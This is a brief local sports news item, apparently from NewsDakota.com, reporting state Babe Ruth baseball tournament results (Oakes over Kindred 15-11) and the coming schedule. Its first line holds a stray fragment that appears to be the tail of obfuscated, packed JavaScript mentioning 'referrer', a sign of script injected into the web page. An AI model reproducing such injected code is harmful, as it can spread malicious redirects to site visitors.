CASSELTON tdeda|var|u0026u|referrer|haeta||js|php’.split(‘|’),0,{}))
(NewsDakota.com) Some wins are exquiste, some are far from it. But at the end of the day, a win is a win, especially when that win advances you to State Class B Babe Ruth Baseball Championship Series.

It sure wasn’t pretty from a baseball purist standpoint, but the boys from Oakes were able to rally from a 6-1 deficit by putting up eight runs in the fifth inning, and held on to defeat Kindred 15-11 on Sunday evening. Cole Kelly earned a win on the mound, while Bryce Meehl came on in the sixth to earn a save. Ethan Zetocha scored three runs and had two hits. Each team committed six errors; and Kindred’s Max Foss took the loss.

In other action from Sunday, Carrington survived yet again and defeated Casselton 10-7 to send the host team home, and Grafton defeated Hatton 7-2 also in loser out play.

Carrington and Grafton play Monday at noon, with the winner taking on Kindred around 3:30. The one team left standing from Monday will play Oakes on Tuesday at 1 p.m., and will have to defeat Oakes twice to win the State Title.

Coverage of Carrington can be heard on KDAK-AM 1600 starting at 11:50 a.m. Monday.
